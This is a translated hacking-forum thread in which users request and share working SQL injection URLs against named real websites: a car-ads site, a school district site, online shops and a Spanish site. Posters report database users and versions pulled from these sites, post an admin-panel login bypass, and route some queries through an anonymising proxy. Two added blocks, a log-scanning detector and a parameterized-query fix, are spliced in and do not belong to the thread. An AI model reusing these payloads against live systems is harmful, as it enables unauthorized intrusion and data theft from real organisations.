Your questions about vulnerabilities.

Discussion in 'Vulnerabilities' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

qaz Elder

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    http://www.oz-gorod.ru/auto_ads.php?aid=3

Here's an SQLi: whatever I substitute, the nature of the error doesn't change. Is there any point in guessing the number of columns?
     
  2. Ereee

Ereee Elder

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    http://www.oz-gorod.ru/auto_ads.php?aid=-3+unioN+seleCt+1
The error disappears. I'll try it through the error now.
    --
    BigBear, true. Blind =/
     
    #18602 Ereee, 13 Dec 2011
    Last edited: 13 Dec 2011
  3. BigBear

    BigBear Escrow Service
Staff Member Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
This is blind SQL injection

Pay attention to the text under the form

    Code:
    http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)=5  TRUE
    
http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)=4  FALSE
    User: us2864h@localhost
    Database: db2864h
    Version: 5.1.57
     
    _________________________
    #18603 BigBear, 13 Dec 2011
    Last edited: 13 Dec 2011
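The boolean probes shown above (`and substring((@@version),1,1)=5`, `union select`) and the `/*!UniOn*/` comment trick that appears in later replies are easy to spot in web-server logs once the query string is URL-decoded and the MySQL version comments are stripped. This detection script is an added example, not from this thread; the log lines are constructed with placeholder hosts, and the rule set is a minimal illustration rather than a complete signature list:

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (placeholder hosts, not the thread's sites);
# the query strings mirror the probe shapes seen in this thread.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Dec/2011:10:01:09 +0300] "GET /auto_ads.php?aid=3+and+substring((@@version),1,1)=5 HTTP/1.1" 200 5120
203.0.113.5 - - [13/Dec/2011:10:01:15 +0300] "GET /auto_ads.php?aid=-3+unioN+seleCt+1 HTTP/1.1" 200 4870
203.0.113.7 - - [13/Dec/2011:10:02:00 +0300] "GET /index.php?pageID=3675_2%27+and+1=0+/*!UniOn*/+select+1+--+ HTTP/1.1" 200 3001
198.51.100.9 - - [13/Dec/2011:10:03:00 +0300] "GET /view.php?id=146 HTTP/1.1" 200 2200
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<path>\S+) HTTP/')

# Each rule is (name, regex) applied to the decoded and normalised query string.
RULES = [
    ("boolean_blind", re.compile(r"\b(and|or)\b\s*\(?\s*(substring|ascii|mid|if)\s*\(", re.I)),
    ("boolean_blind", re.compile(r"\b(and|or)\s+1\s*=\s*[01]\b", re.I)),
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
]

def normalise(raw: str) -> str:
    """Undo what a naive keyword filter misses: URL decoding (including '+'),
    MySQL version comments /*!...*/ that hide keywords, plain comments, whitespace."""
    s = unquote_plus(raw)
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)  # /*!UniOn*/ -> UniOn
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s).strip()

def classify(line: str):
    """Return (ip, path, sorted rule names) or None if the line is not a request."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    decoded = normalise(path.partition("?")[2])
    hits = sorted({name for name, rx in RULES if rx.search(decoded)})
    return m.group("ip"), path, hits

def scan(log_text: str):
    """Yield (ip, path, hits) for every request that matched at least one rule."""
    for line in log_text.splitlines():
        result = classify(line)
        if result and result[2]:
            yield result

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(ip, ",".join(hits), path)
```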
  4. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    843
    Likes Received:
    170
    Reputations:
    84
    Code:
    http://www.kingston.k12.ok.us/index.php?pageID=3675_2%27+and+1=0+/*!UniOn*/+select+1+--+
    :confused:
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.kingston.k12.ok.us/index.php?pageID=3675_2'+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+

    http://www.kingston.k12.ok.us/admin/

authorization bypass in the admin panel

    login : admin' or '1'='1

    pass: pass' or '1'='1
     
    _________________________
    4 people like this.
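The bypass above works because the login form pastes the submitted strings straight into the SQL text, so the quote in the input closes the literal and `or '1'='1` becomes part of the WHERE clause; bound parameters close the hole. This is an added illustration using Python's sqlite3 and a constructed user table, not the site's own code:

```python
import hashlib
import sqlite3

# Constructed demo database; the account and password are placeholders.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT PRIMARY KEY, pass_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", hashlib.sha256(b"correct-horse-battery").hexdigest()))
    return db

def login_vulnerable(db: sqlite3.Connection, login: str, password: str) -> bool:
    # The login field is concatenated into the SQL text. With the input
    # admin' or '1'='1 the clause becomes  login='admin' or '1'='1' AND pass_hash='...'
    # and, since AND binds tighter than OR, login='admin' alone satisfies it.
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = ("SELECT login FROM users WHERE login='" + login +
           "' AND pass_hash='" + pw_hash + "'")
    return db.execute(sql).fetchone() is not None

def login_fixed(db: sqlite3.Connection, login: str, password: str) -> bool:
    # Bound parameter: the value is passed separately from the query text,
    # so quotes in the input are data, never SQL syntax.
    row = db.execute("SELECT pass_hash FROM users WHERE login=?", (login,)).fetchone()
    if row is None:
        return False
    return row[0] == hashlib.sha256(password.encode()).hexdigest()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, injected:", login_vulnerable(db, "admin' or '1'='1", "pass' or '1'='1"))
    print("fixed, injected:     ", login_fixed(db, "admin' or '1'='1", "pass' or '1'='1"))
```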
  6. qaz

qaz Elder

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75

And a question about
    and+substring((@@version),1,1)=5 TRUE

What kind of new exploitation technique is that? Where can I read a manual on it?
     
  7. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Code:
    http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39
    Code:
    http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317
    Cannot get order by.. Any help please?
     
  8. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,675
    Likes Received:
    1,028
    Reputations:
    1,228
Nothing especially complicated about the exploitation.
link
     
    _________________________
    2 people like this.
  9. Ereee

Ereee Elder

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Code:
    http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39'+/*!union*/+select+0,1,2,3,4,5,6,version(),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1--+f
    user():ozchrist_sope1@localhost
    version():5.1.56
    database():ozchrist_sope1

    Code:
    http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+group+by+99999999999--+f  TRUE
    http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+group+by+1--+f  TRUE
I think this is blind injection...
     
    #18609 Ereee, 14 Dec 2011
    Last edited: 14 Dec 2011
  10. Boolean

Boolean Elder

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
lol. It's not blind there.
    Code:
    http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317.1111%27+/*!unION*/+select+1,2,3,4,concat_ws%280x3b,database%28%29,user%28%29,version%28%29%29,6,7,8,9,0,11,12,13+--+
    
When pulling info out of the tables, enclose the database name in quotes.
    Code:
    http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317.1111%27+/*!unION*/+select+1,2,3,4,table_name,6,7,8,9,0,11,12,13+fRom+%60information_schema%60.tables+--+
     
    #18610 Boolean, 14 Dec 2011
    Last edited: 14 Dec 2011
    1 person likes this.
  11. er9j6@

er9j6@ Elder

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Code:
    http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317
Cannot get order by.. Any help please?

     
  12. _Spamer_

_Spamer_ Elder

    Joined:
    3 Feb 2009
    Messages:
    89
    Likes Received:
    140
    Reputations:
    16
    http://pavlodarauto[antiG]ru/info/view.php?id=146
     
  13. PRosTo_LEva

PRosTo_LEva Elder

    Joined:
    18 Apr 2007
    Messages:
    447
    Likes Received:
    129
    Reputations:
    106

Plus rep for me :p
     
    2 people like this.
  14. er9j6@

er9j6@ Elder

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
It can be done like this

     
    1 person likes this.
  15. Zer0-Set

    Zer0-Set New Member

    Joined:
    28 Nov 2011
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
I'm studying buffer overflows and gradually getting into kernel hacking. Question: on which *nix distro would it be convenient for me to write kernel stuff? =\ I've narrowed the choice down to gentoo & debian.
     
  16. qaz

qaz Elder

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
And what about here?
    PHP:
    http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.user--+

it outputs an error

    PHP:
    http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.user+where+user=%27u198287@87%27--+
and this way it's an error too
     
  17. lansia1

    lansia1 New Member

    Joined:
    22 Jun 2011
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0


How do you exploit SQLi like these?
     
  18. Kasper1898

    Kasper1898 New Member

    Joined:
    12 Sep 2011
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
Can someone advise? I've never encountered this kind of approach before
    http://site/login_login_groovy/'
it returns
    1. DB Error: syntax error
    Code: 1064
    Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' AND ssa.user_group_id IN (0)' a
    SQL: SELECT ss.id, ss.parent_id, ss.alias, ss.path, ss.c_img, ssd.name FROM sites_structure ss, sites_structure_desc ssd, sites_structure_access ssa WHERE ss.site_id='1' AND ssd.section_id=ss.id AND ssd.lang_id='1' AND ssa.section_id=ss.id AND ss.alias = ''' AND ssa.user_group_id IN (0)


I can't figure out how to exploit a parameter like this
     
  19. Ereee

Ereee Elder

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
Exploit it as usual =/
    http://site/login_login_groovy/1'+...
lansia1, it doesn't seem to go anywhere.. Maybe it's not SQLi?
     
  20. Kasper1898

    Kasper1898 New Member

    Joined:
    12 Sep 2011
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    Ereee
Thanks, got it)
     
    Sasha1232546 likes this.